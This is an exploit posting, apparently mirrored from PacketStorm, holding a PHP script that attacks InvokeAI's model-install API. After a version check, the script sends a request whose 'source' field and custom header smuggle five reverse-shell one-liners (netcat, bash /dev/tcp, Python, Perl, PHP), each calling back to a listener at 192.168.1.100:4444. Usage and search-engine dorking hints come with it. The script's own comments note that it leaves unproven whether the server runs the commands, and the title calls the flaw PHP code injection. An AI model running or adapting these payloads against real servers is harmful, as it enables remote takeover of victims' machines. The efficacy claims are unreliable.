## https://sploitus.com/exploit?id=PACKETSTORM:189493
=============================================================================================================================================
    | # Title     : InvokeAI v5.0 PHP Code Injection Vulnerability                                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.invoke.com/                                                                                                     |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] The code is a remote command execution (RCE) exploit that targets a vulnerability in InvokeAI, 
    
        which allows an attacker to execute commands via an insecure API that loads and runs models without validating their integrity.
     
    [+] save code as poc.php .
    
    [+] Usage : cmd => c:\www\test\php poc.php 127.0.0.1 id
    
    [+] SeT target  = Line : 99
    
    [+] PayLoad :
    
    <?php
    
    /**
     * Proof-of-concept client for the InvokeAI model-install endpoint.
     *
     * Flow: GET api/v1/app/version to read the reported version, then POST
     * api/v2/models/install with a "source" string that embeds the command
     * list from sendPayload(). Whether the server ever hands "source" (or the
     * custom header) to a shell is not established by this script; it only
     * sends the request and echoes the raw response.
     *
     * Defender notes, grounded in what this script actually sends:
     *  - The install request carries a "source" value containing ";" plus shell
     *    command text and a non-standard "X-Exploit" header, both of which can
     *    be matched in proxy/WAF logs for the /api/v2/models/install path.
     *  - The listener address 192.168.1.100:4444 is hard-coded in every command;
     *    the $payload constructor argument is stored but never read.
     */
    class InvokeAIExploit {
        private $target;            // host/IP every request is sent to
        private $port = 9090;       // HTTP port used by sendRequest()
        private $localPort = 8081;  // used only to build the fake .ckpt URL in sendPayload()
        private $httpDelay = 10;    // declared but never read anywhere in this class
        private $payload;           // set by the constructor, never read afterwards
    
        /**
         * @param string $target  host or IP of the InvokeAI instance
         * @param string $payload kept in $this->payload; no method reads it, the
         *                        commands sent are the hard-coded list in sendPayload()
         */
        public function __construct($target, $payload) {
            $this->target = $target;
            $this->payload = $payload;
        }
    
        /**
         * Performs one HTTP request against http://$target:$port/$uri.
         *
         * @param string     $method  verb set via CURLOPT_CUSTOMREQUEST
         * @param string     $uri     path relative to the host root, no leading slash
         * @param string[]   $headers raw "Name: value" header lines
         * @param array|null $data    JSON-encoded into the body when truthy
         *                            (null or an empty array sends no body)
         * @return string|false response body, or false when curl_exec() fails;
         *                      the curl error is echoed, never thrown
         */
        private function sendRequest($method, $uri, $headers = [], $data = null) {
            $url = "http://{$this->target}:{$this->port}/$uri";
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10); // set a request timeout to avoid a long wait
            
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
            }
            
            $response = curl_exec($ch);
            
            if (curl_errno($ch)) {
                // Reported on stdout only; $response is false in this case and
                // the caller has to cope with that.
                echo "cURL Error: " . curl_error($ch) . "\n";
            }
            
            curl_close($ch);
            return $response;
        }
    
        /**
         * Reads /api/v1/app/version and classifies the reported version string.
         *
         * A failed request (false body) or a body without "version" yields
         * "Unknown version", which startExploit() treats as not vulnerable.
         *
         * @return string "Unknown version", "Vulnerable version detected: X"
         *                or "Safe version: X"; the 4.0.0–5.4.2 window is the
         *                author's claim, nothing here verifies it
         */
        public function checkVulnerability() {
            echo "[" . date("H:i:s") . "] Checking target...\n";
            
            $response = $this->sendRequest("GET", "api/v1/app/version");
            $json = json_decode($response, true);
    
            if (!$json || !isset($json['version'])) {
                return "Unknown version";
            }
    
            $version = $json['version'];
            if (version_compare($version, "4.0.0", ">=") && version_compare($version, "5.4.2", "<=")) {
                return "Vulnerable version detected: $version";
            }
            return "Safe version: $version";
        }
    
        /**
         * Sends the model-install request carrying the hard-coded command strings.
         *
         * "source" is a fake .ckpt URL built from $target and $localPort (random
         * 8-hex-char name), followed by ";" and the joined command list; the same
         * list is repeated in a custom X-Exploit header. Note "inplace" is sent as
         * the string "true", not JSON boolean true.
         *
         * @return string|false raw response body from sendRequest()
         */
        public function sendPayload() {
        $maliciousModel = "http://{$this->target}:{$this->localPort}/" . bin2hex(random_bytes(4)) . ".ckpt";
    
        // All reverse-connection command variants; listener 192.168.1.100:4444 is hard-coded in each
        $payloads = [
            "nc -e /bin/sh 192.168.1.100 4444",                      // Netcat
            "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1",          // Bash
            "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'", // Python3
            "perl -e 'use Socket;$i=\"192.168.1.100\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&S\");open(STDOUT,\"&S\");open(STDERR,\"&S\");exec(\"/bin/sh -i\");};'", // Perl
            "php -r '\$sock=fsockopen(\"192.168.1.100\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", // PHP Reverse Shell
        ];
    
        // Merge the commands into `source` and into the custom header
        $payloadCommand = implode(" ; ", $payloads);
    
        $headers = [
            "Content-Type: application/json",
            "X-Exploit: {$payloadCommand}" // only relevant if the application uses this header internally
        ];
    
        $data = [
            "source" => "{$maliciousModel}; {$payloadCommand}",
            "inplace" => "true"
        ];
    
        echo "[+] Sending Reverse Shell Payloads...\n";
        $response = $this->sendRequest("POST", "api/v2/models/install", $headers, $data);
        return $response;
    }
    
    
        /**
         * Runs the version check and, only when its message contains "Vulnerable",
         * sends the install request and echoes the raw response.
         *
         * die() terminates the whole script on any other result, so nothing
         * after this call runs in that case.
         */
        public function startExploit() {
            $check = $this->checkVulnerability();
            echo "$check\n";
            
            if (strpos($check, "Vulnerable") === false) {
                die("[" . date("H:i:s") . "] Target is not vulnerable.\n");
            }
    
            $result = $this->sendPayload();
            echo "[" . date("H:i:s") . "] Response: $result\n";
        }
    }
    
    // Script entry: run the check-then-install flow against the hard-coded address,
    // passing "id" as the payload argument (the class stores it but never reads it;
    // sendPayload() sends its own hard-coded command list instead).
    $exploit = new InvokeAIExploit("192.168.1.1", "id");
    $exploit->startExploit();
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================